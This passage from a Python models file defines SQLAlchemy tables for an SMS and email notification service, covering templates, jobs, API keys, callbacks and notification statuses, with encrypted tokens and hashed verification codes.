"updated_at": get_dt_string_or_none(self.updated_at),
"service": serialize_service() if self.service else None,
}
class InboundNumber(db.Model):
__tablename__ = "inbound_numbers"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
number = db.Column(db.String(255), unique=True, nullable=False)
provider = db.Column(db.String(), nullable=False)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=True,
index=True,
nullable=True,
)
service = db.relationship(
Service, backref=db.backref("inbound_number", uselist=False)
)
active = db.Column(
db.Boolean, index=False, unique=False, nullable=False, default=True
)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
def serialize(self):
def serialize_service():
return {"id": str(self.service_id), "name": self.service.name}
return {
"id": str(self.id),
"number": self.number,
"provider": self.provider,
"service": serialize_service() if self.service else None,
"active": self.active,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class ServiceSmsSender(db.Model):
__tablename__ = "service_sms_senders"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
sms_sender = db.Column(db.String(11), nullable=False)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
index=True,
nullable=False,
unique=False,
)
service = db.relationship(
Service, backref=db.backref("service_sms_senders", uselist=True)
)
is_default = db.Column(db.Boolean, nullable=False, default=True)
archived = db.Column(db.Boolean, nullable=False, default=False)
inbound_number_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("inbound_numbers.id"),
unique=True,
index=True,
nullable=True,
)
inbound_number = db.relationship(
InboundNumber, backref=db.backref("inbound_number", uselist=False)
)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
def get_reply_to_text(self):
return try_validate_and_format_phone_number(self.sms_sender)
def serialize(self):
return {
"id": str(self.id),
"sms_sender": self.sms_sender,
"service_id": str(self.service_id),
"is_default": self.is_default,
"archived": self.archived,
"inbound_number_id": str(self.inbound_number_id)
if self.inbound_number_id
else None,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class ServicePermission(db.Model):
__tablename__ = "service_permissions"
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
primary_key=True,
index=True,
nullable=False,
)
permission = db.Column(
db.String(255),
db.ForeignKey("service_permission_types.name"),
index=True,
primary_key=True,
nullable=False,
)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
service_permission_types = db.relationship(
Service, backref=db.backref("permissions", cascade="all, delete-orphan")
)
def __repr__(self):
return "<{} has service permission: {}>".format(
self.service_id, self.permission
)
MOBILE_TYPE = "mobile"
EMAIL_TYPE = "email"
GUEST_LIST_RECIPIENT_TYPE = [MOBILE_TYPE, EMAIL_TYPE]
guest_list_recipient_types = db.Enum(*GUEST_LIST_RECIPIENT_TYPE, name="recipient_type")
class ServiceGuestList(db.Model):
__tablename__ = "service_whitelist"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
service = db.relationship("Service", backref="guest_list")
recipient_type = db.Column(guest_list_recipient_types, nullable=False)
recipient = db.Column(db.String(255), nullable=False)
created_at = db.Column(db.DateTime, default=datetime.datetime.utcnow)
@classmethod
def from_string(cls, service_id, recipient_type, recipient):
instance = cls(service_id=service_id, recipient_type=recipient_type)
try:
if recipient_type == MOBILE_TYPE:
instance.recipient = validate_phone_number(
recipient, international=True
)
elif recipient_type == EMAIL_TYPE:
instance.recipient = validate_email_address(recipient)
else:
raise ValueError("Invalid recipient type")
except InvalidPhoneError:
raise ValueError('Invalid guest list: "{}"'.format(recipient))
except InvalidEmailError:
raise ValueError('Invalid guest list: "{}"'.format(recipient))
else:
return instance
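    # Illustrative usage (a sketch; the ids and address below are hypothetical):
    #     entry = ServiceGuestList.from_string(service_id, EMAIL_TYPE, "user@example.gov")
    # Both validation failures above are re-raised as ValueError, so callers can
    # handle a single exception type regardless of recipient_type.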
def __repr__(self):
return "Recipient {} of type: {}".format(self.recipient, self.recipient_type)
class ServiceInboundApi(db.Model, Versioned):
__tablename__ = "service_inbound_api"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
index=True,
nullable=False,
unique=True,
)
service = db.relationship("Service", backref="inbound_api")
url = db.Column(db.String(), nullable=False)
_bearer_token = db.Column("bearer_token", db.String(), nullable=False)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
updated_at = db.Column(db.DateTime, nullable=True)
updated_by = db.relationship("User")
updated_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
@property
def bearer_token(self):
return encryption.decrypt(self._bearer_token)
@bearer_token.setter
def bearer_token(self, bearer_token):
if bearer_token:
self._bearer_token = encryption.encrypt(str(bearer_token))
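    # The `bearer_token` property encrypts on write and decrypts on read, so
    # only ciphertext ever reaches the `bearer_token` column. A sketch of the
    # round trip (the `encryption` helper is this app's own wrapper, assumed
    # symmetric):
    #     inbound_api.bearer_token = "some-token"   # stored encrypted
    #     inbound_api.bearer_token                  # -> "some-token"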
def serialize(self):
return {
"id": str(self.id),
"service_id": str(self.service_id),
"url": self.url,
"updated_by_id": str(self.updated_by_id),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class ServiceCallbackApi(db.Model, Versioned):
__tablename__ = "service_callback_api"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
service = db.relationship("Service", backref="service_callback_api")
url = db.Column(db.String(), nullable=False)
callback_type = db.Column(
db.String(), db.ForeignKey("service_callback_type.name"), nullable=True
)
_bearer_token = db.Column("bearer_token", db.String(), nullable=False)
created_at = db.Column(
db.DateTime, default=datetime.datetime.utcnow, nullable=False
)
updated_at = db.Column(db.DateTime, nullable=True)
updated_by = db.relationship("User")
updated_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
__table_args__ = (
UniqueConstraint(
"service_id", "callback_type", name="uix_service_callback_type"
),
)
@property
def bearer_token(self):
return encryption.decrypt(self._bearer_token)
@bearer_token.setter
def bearer_token(self, bearer_token):
if bearer_token:
self._bearer_token = encryption.encrypt(str(bearer_token))
def serialize(self):
return {
"id": str(self.id),
"service_id": str(self.service_id),
"url": self.url,
"updated_by_id": str(self.updated_by_id),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class ServiceCallbackType(db.Model):
__tablename__ = "service_callback_type"
name = db.Column(db.String, primary_key=True)
class ApiKey(db.Model, Versioned):
__tablename__ = "api_keys"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
name = db.Column(db.String(255), nullable=False)
_secret = db.Column("secret", db.String(255), unique=True, nullable=False)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
service = db.relationship("Service", backref="api_keys")
key_type = db.Column(
db.String(255), db.ForeignKey("key_types.name"), index=True, nullable=False
)
expiry_date = db.Column(db.DateTime)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
created_by = db.relationship("User")
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
__table_args__ = (
Index(
"uix_service_to_key_name",
"service_id",
"name",
unique=True,
postgresql_where=expiry_date.is_(None),
),
)
@property
def secret(self):
return encryption.decrypt(self._secret)
@secret.setter
def secret(self, secret):
if secret:
self._secret = encryption.encrypt(str(secret))
KEY_TYPE_NORMAL = "normal"
KEY_TYPE_TEAM = "team"
KEY_TYPE_TEST = "test"
class KeyTypes(db.Model):
__tablename__ = "key_types"
name = db.Column(db.String(255), primary_key=True)
class TemplateProcessTypes(db.Model):
__tablename__ = "template_process_type"
name = db.Column(db.String(255), primary_key=True)
class TemplateFolder(db.Model):
__tablename__ = "template_folder"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), nullable=False
)
name = db.Column(db.String, nullable=False)
parent_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("template_folder.id"), nullable=True
)
service = db.relationship("Service", backref="all_template_folders")
parent = db.relationship("TemplateFolder", remote_side=[id], backref="subfolders")
users = db.relationship(
"ServiceUser",
uselist=True,
backref=db.backref(
"folders", foreign_keys="user_folder_permissions.c.template_folder_id"
),
secondary="user_folder_permissions",
primaryjoin="TemplateFolder.id == user_folder_permissions.c.template_folder_id",
)
__table_args__ = (UniqueConstraint("id", "service_id", name="ix_id_service_id"), {})
def serialize(self):
return {
"id": self.id,
"name": self.name,
"parent_id": self.parent_id,
"service_id": self.service_id,
"users_with_permission": self.get_users_with_permission(),
}
def is_parent_of(self, other):
while other.parent is not None:
if other.parent == self:
return True
other = other.parent
return False
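    # Example (illustrative folder names): if folder C sits inside B, and B
    # sits inside A, then A.is_parent_of(C) is True because the loop walks
    # C -> B -> A up the parent chain.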
def get_users_with_permission(self):
service_users = self.users
users_with_permission = [
str(service_user.user_id) for service_user in service_users
]
return users_with_permission
template_folder_map = db.Table(
"template_folder_map",
db.Model.metadata,
# template_id is a primary key as a template can only belong in one folder
db.Column(
"template_id",
UUID(as_uuid=True),
db.ForeignKey("templates.id"),
primary_key=True,
nullable=False,
),
db.Column(
"template_folder_id",
UUID(as_uuid=True),
db.ForeignKey("template_folder.id"),
nullable=False,
),
)
class TemplateBase(db.Model):
__abstract__ = True
def __init__(self, **kwargs):
if "template_type" in kwargs:
self.template_type = kwargs.pop("template_type")
super().__init__(**kwargs)
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
name = db.Column(db.String(255), nullable=False)
template_type = db.Column(template_types, nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(db.DateTime, onupdate=datetime.datetime.utcnow)
content = db.Column(db.Text, nullable=False)
archived = db.Column(db.Boolean, nullable=False, default=False)
hidden = db.Column(db.Boolean, nullable=False, default=False)
subject = db.Column(db.Text)
@declared_attr
def service_id(cls):
return db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
@declared_attr
def created_by_id(cls):
return db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
@declared_attr
def created_by(cls):
return db.relationship("User")
@declared_attr
def process_type(cls):
return db.Column(
db.String(255),
db.ForeignKey("template_process_type.name"),
index=True,
nullable=False,
default=NORMAL,
)
redact_personalisation = association_proxy(
"template_redacted", "redact_personalisation"
)
# TODO: possibly unnecessary after removing letters
@property
def reply_to(self):
return None
@reply_to.setter
def reply_to(self, value):
if value is None:
pass
else:
raise ValueError(
"Unable to set sender for {} template".format(self.template_type)
)
def get_reply_to_text(self):
if self.template_type == EMAIL_TYPE:
return self.service.get_default_reply_to_email_address()
elif self.template_type == SMS_TYPE:
return try_validate_and_format_phone_number(
self.service.get_default_sms_sender()
)
else:
return None
def _as_utils_template(self):
if self.template_type == EMAIL_TYPE:
return PlainTextEmailTemplate(self.__dict__)
if self.template_type == SMS_TYPE:
return SMSMessageTemplate(self.__dict__)
def _as_utils_template_with_personalisation(self, values):
template = self._as_utils_template()
template.values = values
return template
def serialize_for_v2(self):
serialized = {
"id": str(self.id),
"type": self.template_type,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
"created_by": self.created_by.email_address,
"version": self.version,
"body": self.content,
"subject": self.subject if self.template_type == EMAIL_TYPE else None,
"name": self.name,
"personalisation": {
key: {
"required": True,
}
for key in self._as_utils_template().placeholders
},
}
return serialized
class Template(TemplateBase):
__tablename__ = "templates"
service = db.relationship("Service", backref="templates")
version = db.Column(db.Integer, default=0, nullable=False)
folder = db.relationship(
"TemplateFolder",
secondary=template_folder_map,
uselist=False,
# eagerly load the folder whenever the template object is fetched
lazy="joined",
backref=db.backref("templates"),
)
def get_link(self):
# TODO: use "/v2/" route once available
return url_for(
"template.get_template_by_id_and_service_id",
service_id=self.service_id,
template_id=self.id,
_external=True,
)
@classmethod
def from_json(cls, data, folder):
"""
Assumption: data has been validated appropriately.
Returns a Template object based on the provided data.
"""
fields = data.copy()
fields["created_by_id"] = fields.pop("created_by")
fields["service_id"] = fields.pop("service")
fields["folder"] = folder
return cls(**fields)
class TemplateRedacted(db.Model):
__tablename__ = "template_redacted"
template_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("templates.id"),
primary_key=True,
nullable=False,
)
redact_personalisation = db.Column(db.Boolean, nullable=False, default=False)
updated_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=False, index=True
)
updated_by = db.relationship("User")
# uselist=False as this is a one-to-one relationship
template = db.relationship(
"Template",
uselist=False,
backref=db.backref("template_redacted", uselist=False),
)
class TemplateHistory(TemplateBase):
__tablename__ = "templates_history"
service = db.relationship("Service")
version = db.Column(db.Integer, primary_key=True, nullable=False)
@declared_attr
def template_redacted(cls):
return db.relationship(
"TemplateRedacted",
foreign_keys=[cls.id],
primaryjoin="TemplateRedacted.template_id == TemplateHistory.id",
)
def get_link(self):
return url_for(
"v2_template.get_template_by_id",
template_id=self.id,
version=self.version,
_external=True,
)
SNS_PROVIDER = "sns"
SES_PROVIDER = "ses"
SMS_PROVIDERS = [SNS_PROVIDER]
EMAIL_PROVIDERS = [SES_PROVIDER]
PROVIDERS = SMS_PROVIDERS + EMAIL_PROVIDERS
notification_types = db.Enum(*NOTIFICATION_TYPES, name="notification_type")
class ProviderDetails(db.Model):
__tablename__ = "provider_details"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
display_name = db.Column(db.String, nullable=False)
identifier = db.Column(db.String, nullable=False)
priority = db.Column(db.Integer, nullable=False)
notification_type = db.Column(notification_types, nullable=False)
active = db.Column(db.Boolean, default=False, nullable=False)
version = db.Column(db.Integer, default=1, nullable=False)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=True
)
created_by = db.relationship("User")
supports_international = db.Column(db.Boolean, nullable=False, default=False)
class ProviderDetailsHistory(db.Model, HistoryModel):
__tablename__ = "provider_details_history"
id = db.Column(UUID(as_uuid=True), primary_key=True, nullable=False)
display_name = db.Column(db.String, nullable=False)
identifier = db.Column(db.String, nullable=False)
priority = db.Column(db.Integer, nullable=False)
notification_type = db.Column(notification_types, nullable=False)
active = db.Column(db.Boolean, nullable=False)
version = db.Column(db.Integer, primary_key=True, nullable=False)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=True
)
created_by = db.relationship("User")
supports_international = db.Column(db.Boolean, nullable=False, default=False)
JOB_STATUS_PENDING = "pending"
JOB_STATUS_IN_PROGRESS = "in progress"
JOB_STATUS_FINISHED = "finished"
JOB_STATUS_SENDING_LIMITS_EXCEEDED = "sending limits exceeded"
JOB_STATUS_SCHEDULED = "scheduled"
JOB_STATUS_CANCELLED = "cancelled"
JOB_STATUS_READY_TO_SEND = "ready to send"
JOB_STATUS_SENT_TO_DVLA = "sent to dvla"
JOB_STATUS_ERROR = "error"
JOB_STATUS_TYPES = [
JOB_STATUS_PENDING,
JOB_STATUS_IN_PROGRESS,
JOB_STATUS_FINISHED,
JOB_STATUS_SENDING_LIMITS_EXCEEDED,
JOB_STATUS_SCHEDULED,
JOB_STATUS_CANCELLED,
JOB_STATUS_READY_TO_SEND,
JOB_STATUS_SENT_TO_DVLA,
JOB_STATUS_ERROR,
]
class JobStatus(db.Model):
__tablename__ = "job_status"
name = db.Column(db.String(255), primary_key=True)
class Job(db.Model):
__tablename__ = "jobs"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
original_file_name = db.Column(db.String, nullable=False)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
index=True,
unique=False,
nullable=False,
)
service = db.relationship("Service", backref=db.backref("jobs", lazy="dynamic"))
template_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("templates.id"), index=True, unique=False
)
template = db.relationship("Template", backref=db.backref("jobs", lazy="dynamic"))
template_version = db.Column(db.Integer, nullable=False)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
notification_count = db.Column(db.Integer, nullable=False)
notifications_sent = db.Column(db.Integer, nullable=False, default=0)
notifications_delivered = db.Column(db.Integer, nullable=False, default=0)
notifications_failed = db.Column(db.Integer, nullable=False, default=0)
processing_started = db.Column(
db.DateTime, index=False, unique=False, nullable=True
)
processing_finished = db.Column(
db.DateTime, index=False, unique=False, nullable=True
)
created_by = db.relationship("User")
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=True
)
scheduled_for = db.Column(db.DateTime, index=True, unique=False, nullable=True)
job_status = db.Column(
db.String(255),
db.ForeignKey("job_status.name"),
index=True,
nullable=False,
default="pending",
)
archived = db.Column(db.Boolean, nullable=False, default=False)
VERIFY_CODE_TYPES = [EMAIL_TYPE, SMS_TYPE]
class VerifyCode(db.Model):
__tablename__ = "verify_codes"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
user_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
user = db.relationship("User", backref=db.backref("verify_codes", lazy="dynamic"))
_code = db.Column(db.String, nullable=False)
code_type = db.Column(
db.Enum(*VERIFY_CODE_TYPES, name="verify_code_types"),
index=False,
unique=False,
nullable=False,
)
expiry_datetime = db.Column(db.DateTime, nullable=False)
code_used = db.Column(db.Boolean, default=False)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
@property
def code(self):
raise AttributeError("Code not readable")
@code.setter
def code(self, cde):
self._code = hashpw(cde)
def check_code(self, cde):
return check_hash(cde, self._code)
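    # Sketch of the write-only contract above (values illustrative):
    #     vc.code = "12345"        # stored as a hash via hashpw
    #     vc.check_code("12345")   # -> True
    #     vc.code                  # raises AttributeError: plaintext is never kept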
NOTIFICATION_CANCELLED = "cancelled"
NOTIFICATION_CREATED = "created"
NOTIFICATION_SENDING = "sending"
NOTIFICATION_SENT = "sent"
NOTIFICATION_DELIVERED = "delivered"
NOTIFICATION_PENDING = "pending"
NOTIFICATION_FAILED = "failed"
NOTIFICATION_TECHNICAL_FAILURE = "technical-failure"
NOTIFICATION_TEMPORARY_FAILURE = "temporary-failure"
NOTIFICATION_PERMANENT_FAILURE = "permanent-failure"
NOTIFICATION_PENDING_VIRUS_CHECK = "pending-virus-check"
NOTIFICATION_VALIDATION_FAILED = "validation-failed"
NOTIFICATION_VIRUS_SCAN_FAILED = "virus-scan-failed"
NOTIFICATION_STATUS_TYPES_FAILED = [
NOTIFICATION_TECHNICAL_FAILURE,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
NOTIFICATION_VALIDATION_FAILED,
NOTIFICATION_VIRUS_SCAN_FAILED,
]
NOTIFICATION_STATUS_TYPES_COMPLETED = [
NOTIFICATION_SENT,
NOTIFICATION_DELIVERED,
NOTIFICATION_FAILED,
NOTIFICATION_TECHNICAL_FAILURE,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
NOTIFICATION_CANCELLED,
]
NOTIFICATION_STATUS_SUCCESS = [NOTIFICATION_SENT, NOTIFICATION_DELIVERED]
NOTIFICATION_STATUS_TYPES_BILLABLE = [
NOTIFICATION_SENDING,
NOTIFICATION_SENT,
NOTIFICATION_DELIVERED,
NOTIFICATION_PENDING,
NOTIFICATION_FAILED,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
]
NOTIFICATION_STATUS_TYPES_BILLABLE_SMS = [
NOTIFICATION_SENDING,
NOTIFICATION_SENT, # internationally
NOTIFICATION_DELIVERED,
NOTIFICATION_PENDING,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
]
# We don't really have a concept of billable emails; however, the ft_billing
# table only includes emails that we have actually sent.
NOTIFICATION_STATUS_TYPES_SENT_EMAILS = [
NOTIFICATION_SENDING,
NOTIFICATION_DELIVERED,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
]
NOTIFICATION_STATUS_TYPES = [
NOTIFICATION_CANCELLED,
NOTIFICATION_CREATED,
NOTIFICATION_SENDING,
NOTIFICATION_SENT,
NOTIFICATION_DELIVERED,
NOTIFICATION_PENDING,
NOTIFICATION_FAILED,
NOTIFICATION_TECHNICAL_FAILURE,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
NOTIFICATION_PENDING_VIRUS_CHECK,
NOTIFICATION_VALIDATION_FAILED,
NOTIFICATION_VIRUS_SCAN_FAILED,
]
NOTIFICATION_STATUS_TYPES_NON_BILLABLE = list(
set(NOTIFICATION_STATUS_TYPES) - set(NOTIFICATION_STATUS_TYPES_BILLABLE)
)
NOTIFICATION_STATUS_TYPES_ENUM = db.Enum(
*NOTIFICATION_STATUS_TYPES, name="notify_status_type"
)
class NotificationStatusTypes(db.Model):
__tablename__ = "notification_status_types"
name = db.Column(db.String(), primary_key=True)
class NotificationAllTimeView(db.Model):
"""
WARNING: this view is a union of rows in "notifications" and
"notification_history". Any query on this view will query both
tables and therefore rely on *both* sets of indices.
"""
__tablename__ = "notifications_all_time_view"
# Tell alembic not to create this as a table. We have a migration where we manually set this up as a view.
# This is custom logic we apply - not built-in logic. See `migrations/env.py`
__table_args__ = {"info": {"managed_by_alembic": False}}
id = db.Column(UUID(as_uuid=True), primary_key=True)
job_id = db.Column(UUID(as_uuid=True))
job_row_number = db.Column(db.Integer)
service_id = db.Column(UUID(as_uuid=True))
template_id = db.Column(UUID(as_uuid=True))
template_version = db.Column(db.Integer)
api_key_id = db.Column(UUID(as_uuid=True))
key_type = db.Column(db.String)
billable_units = db.Column(db.Integer)
notification_type = db.Column(notification_types)
created_at = db.Column(db.DateTime)
sent_at = db.Column(db.DateTime)
sent_by = db.Column(db.String)
updated_at = db.Column(db.DateTime)
status = db.Column("notification_status", db.Text)
reference = db.Column(db.String)
client_reference = db.Column(db.String)
international = db.Column(db.Boolean)
phone_prefix = db.Column(db.String)
rate_multiplier = db.Column(db.Numeric(asdecimal=False))
created_by_id = db.Column(UUID(as_uuid=True))
document_download_count = db.Column(db.Integer)
class Notification(db.Model):
__tablename__ = "notifications"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
to = db.Column(db.String, nullable=False)
normalised_to = db.Column(db.String, nullable=True)
job_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("jobs.id"), index=True, unique=False
)
job = db.relationship("Job", backref=db.backref("notifications", lazy="dynamic"))
job_row_number = db.Column(db.Integer, nullable=True)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), unique=False
)
service = db.relationship("Service")
template_id = db.Column(UUID(as_uuid=True), index=True, unique=False)
template_version = db.Column(db.Integer, nullable=False)
template = db.relationship("TemplateHistory")
api_key_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("api_keys.id"), unique=False
)
api_key = db.relationship("ApiKey")
key_type = db.Column(
db.String, db.ForeignKey("key_types.name"), unique=False, nullable=False
)
billable_units = db.Column(db.Integer, nullable=False, default=0)
notification_type = db.Column(notification_types, nullable=False)
created_at = db.Column(db.DateTime, index=True, unique=False, nullable=False)
sent_at = db.Column(db.DateTime, index=False, unique=False, nullable=True)
sent_by = db.Column(db.String, nullable=True)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
status = db.Column(
"notification_status",
db.Text,
db.ForeignKey("notification_status_types.name"),
nullable=True,
default="created",
key="status", # http://docs.sqlalchemy.org/en/latest/core/metadata.html#sqlalchemy.schema.Column
)
reference = db.Column(db.String, nullable=True, index=True)
client_reference = db.Column(db.String, index=True, nullable=True)
_personalisation = db.Column(db.String, nullable=True)
international = db.Column(db.Boolean, nullable=False, default=False)
phone_prefix = db.Column(db.String, nullable=True)
rate_multiplier = db.Column(db.Numeric(asdecimal=False), nullable=True)
created_by = db.relationship("User")
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=True
)
reply_to_text = db.Column(db.String, nullable=True)
document_download_count = db.Column(db.Integer, nullable=True)
provider_response = db.Column(db.Text, nullable=True)
# queue_name = db.Column(db.Text, nullable=True)
__table_args__ = (
db.ForeignKeyConstraint(
["template_id", "template_version"],
["templates_history.id", "templates_history.version"],
),
UniqueConstraint(
"job_id", "job_row_number", name="uq_notifications_job_row_number"
),
Index(
"ix_notifications_notification_type_composite",
"notification_type",
"status",
"created_at",
),
Index("ix_notifications_service_created_at", "service_id", "created_at"),
Index(
"ix_notifications_service_id_composite",
"service_id",
"notification_type",
"status",
"created_at",
),
)
@property
def personalisation(self):
if self._personalisation:
try:
return encryption.decrypt(self._personalisation)
except EncryptionError:
current_app.logger.error(
"Error decrypting notification.personalisation, returning empty dict"
)
return {}
@personalisation.setter
def personalisation(self, personalisation):
self._personalisation = encryption.encrypt(personalisation or {})
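    # Round-trip sketch (values illustrative):
    #     n.personalisation = {"name": "Jo"}   # encrypted before storage
    #     n.personalisation                    # -> {"name": "Jo"}
    # If decryption fails (for example after a key rotation, an assumed
    # scenario rather than a documented one), the getter logs the error and
    # returns {} instead of raising.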
def completed_at(self):
if self.status in NOTIFICATION_STATUS_TYPES_COMPLETED:
return self.updated_at.strftime(DATETIME_FORMAT)
return None
@staticmethod
def substitute_status(status_or_statuses):
"""
static function that takes a status or list of statuses and substitutes our new failure types if it finds
the deprecated one
> IN
'failed'
< OUT
['technical-failure', 'temporary-failure', 'permanent-failure']
-
> IN
['failed', 'created', 'accepted']
< OUT
['technical-failure', 'temporary-failure', 'permanent-failure', 'created', 'sending']
-
> IN
'delivered'
< OUT
['received']
:param status_or_statuses: a single status or list of statuses
:return: a single status or list with the current failure statuses substituted for 'failure'
"""
def _substitute_status_str(_status):
return (
NOTIFICATION_STATUS_TYPES_FAILED
if _status == NOTIFICATION_FAILED
else [_status]
)
def _substitute_status_seq(_statuses):
return list(
set(
itertools.chain.from_iterable(
_substitute_status_str(status) for status in _statuses
)
)
)
if isinstance(status_or_statuses, str):
return _substitute_status_str(status_or_statuses)
return _substitute_status_seq(status_or_statuses)
@property
def content(self):
return self.template._as_utils_template_with_personalisation(
self.personalisation
).content_with_placeholders_filled_in
@property
def subject(self):
template_object = self.template._as_utils_template_with_personalisation(
self.personalisation
)
return getattr(template_object, "subject", None)
@property
def formatted_status(self):
return {
"email": {
"failed": "Failed",
"technical-failure": "Technical failure",
"temporary-failure": "Inbox not accepting messages right now",
"permanent-failure": "Email address doesn’t exist",
"delivered": "Delivered",
"sending": "Sending",
"created": "Sending",
"sent": "Delivered",
},
"sms": {
"failed": "Failed",
"technical-failure": "Technical failure",
"temporary-failure": "Unable to find carrier response -- still looking",
"permanent-failure": "Unable to find carrier response.",
"delivered": "Delivered",
"sending": "Sending",
"created": "Sending",
"sent": "Sent internationally",
},
}[self.template.template_type].get(self.status, self.status)
def get_created_by_name(self):
if self.created_by:
return self.created_by.name
else:
return None
def get_created_by_email_address(self):
if self.created_by:
return self.created_by.email_address
else:
return None
def serialize_for_csv(self):
serialized = {
"row_number": ""
if self.job_row_number is None
else self.job_row_number + 1,
"recipient": self.to,
"client_reference": self.client_reference or "",
"template_name": self.template.name,
"template_type": self.template.template_type,
"job_name": self.job.original_file_name if self.job else "",
"status": self.formatted_status,
"created_at": self.created_at.strftime("%Y-%m-%d %H:%M:%S"),
"created_by_name": self.get_created_by_name(),
"created_by_email_address": self.get_created_by_email_address(),
}
return serialized
def serialize(self):
template_dict = {
"version": self.template.version,
"id": self.template.id,
"uri": self.template.get_link(),
}
serialized = {
"id": self.id,
"reference": self.client_reference,
"email_address": self.to if self.notification_type == EMAIL_TYPE else None,
"phone_number": self.to if self.notification_type == SMS_TYPE else None,
"line_1": None,
"line_2": None,
"line_3": None,
"line_4": None,
"line_5": None,
"line_6": None,
"postcode": None,
"type": self.notification_type,
"status": self.status,
"provider_response": self.provider_response,
"template": template_dict,
"body": self.content,
"subject": self.subject,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"created_by_name": self.get_created_by_name(),
"sent_at": get_dt_string_or_none(self.sent_at),
"completed_at": self.completed_at(),
"scheduled_for": None,
}
return serialized
class NotificationHistory(db.Model, HistoryModel):
__tablename__ = "notification_history"
id = db.Column(UUID(as_uuid=True), primary_key=True)
job_id = db.Column(
